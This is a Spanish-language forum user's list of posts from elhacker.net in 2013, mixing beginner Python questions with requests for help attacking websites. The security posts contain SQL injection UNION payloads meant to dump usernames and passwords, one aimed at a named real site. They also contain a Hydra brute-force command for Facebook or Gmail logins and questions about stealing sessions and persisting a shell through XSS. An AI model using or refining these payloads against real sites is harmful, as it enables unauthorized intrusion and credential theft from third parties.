elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Nivel Web / QUE SE PUEDE HACER CON UNA VUNLERABILIDAD ASP.NET en: 18 Enero 2013, 21:12 pm
como testear una vulnerabilidad en ASP.net y como aprovecharla
2  Seguridad Informática / Nivel Web / AYUDA CON SQL en: 16 Enero 2013, 22:36 pm
BUENO ESTABA TESTEANDO UNA PAGINA WEB Y ME QUEDE AQUI

-30633+UNION+SELECT+1,2,3,4,5,6,group_concat(login,0x3a,password.),8,9,10,11,12,13+from+usuario--

QUIERO QUE ME DE EL USUARIO Y LA CONTRAEÑA PERO NO ME LA DA

QUE ES LO QUE TENGO MAL
3  Seguridad Informática / Nivel Web / QUE PUEDES HACER CON UNA VULNERABILIDAD XSS en: 16 Enero 2013, 20:25 pm
esque me encontré una vulne en xss pero quería saver que se puede hacer con ella escuche de un maestro que se pueden robar sesiones

pero ejecute una shell en html y se ejecute pero no se guarda

como se podría guardar esa shell sin que se borre ???
4  Programación / Programación General / error de sintaxis en python en: 12 Enero 2013, 00:11 am
esque me estoy metiendo con python y estoy el el if elif else

y no me ejecuta ya que dice error de syntaxis y me marcaca error en else

mi ejercicio ere este

Código
  1. var1 = raw_input("tu edad")
  2.  
  3. if var1 >= 18:
  4. print "eres mayor de edad"
  5.  
  6. elif var < 18:
  7. print " no eres mayor de edad"
  8.  
  9. else:
  10. print "no es un numero"
  11.  

y luego me marca error en el elif y else

es python 2.7








5  Programación / Scripting / >>>>>>>>>>>>>>Convertir binarios en python<<<<<<<<<<<<<<< en: 7 Enero 2013, 05:43 am
lo que quiero hacer es como cuando ingresas un valor en las paginas donde te dan el binario tienes que ingresar tu texto por ejemplo "hola mundo" y te dan el binario es lo que yo quiero hacer pero con python

alguien que me pudiera ayudar con eso se lo agraceria mucho gracias
6  Seguridad Informática / Hacking / hydra escupe demasiados positivos en login de face en: 7 Enero 2013, 05:04 am
bueno lo me sale en el hydra es cuando se epieza a logear en el face o gmail ya que se tiene que tomar el id de los campos y colocarlos en en hydra este es el codigo que utilizo

Código
  1. hydra -l USUARIO -p contraseña www.pagina.com http-post-form "/login.php?login_attempt=1:email=^USER^&pass=^PASS^:incorrect"
  2.  
ya que pass es el id del campo de la contra y el user es el id de el campo de usuario
7  Programación / Programación General / Encriptador en Python en: 6 Enero 2013, 03:36 am
lo que queria hacer es cifrar lineas de texto pero no con una ya existente sino con una que yo pueda crear por ejemplo meter un texto "hola" y utlizar el codigo ASCII
y darle un valor a cada letra y después que se descifra volver a darme el "hola"



gracias


 
8  Seguridad Informática / Bugs y Exploits / INYECCION SQL MANUAL AYUDA en: 5 Enero 2013, 20:00 pm
BUENO ENCONTRÉ UNA PAGINA VULNERABLE A INYECCIÓN NO LO AGO CON OTRAS INTENCIONES YA QUE SOY ESTUDIANTE DE INGENIERÍA EN SISTEMAS Y QUIERO SABER MAS ACERCA DE LAS VULNERABILIDADES ES ESTA LA PAGINA

http://www.franzmayer.org.mx/detallexpo.phpid=-139+union+select+1,2,3,4,5,6,7,8--

ya lo ise con sqlmap y si funciona pero la quiero hacer a mano pero me atore


ay es donde me salen los numeros dentro del (ver programa educativo) pero ya le incluyo lo siguiente y no me salen las tablas

abersi me podrían ayudar con eso quiero ver como se ase lo siguiente

Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines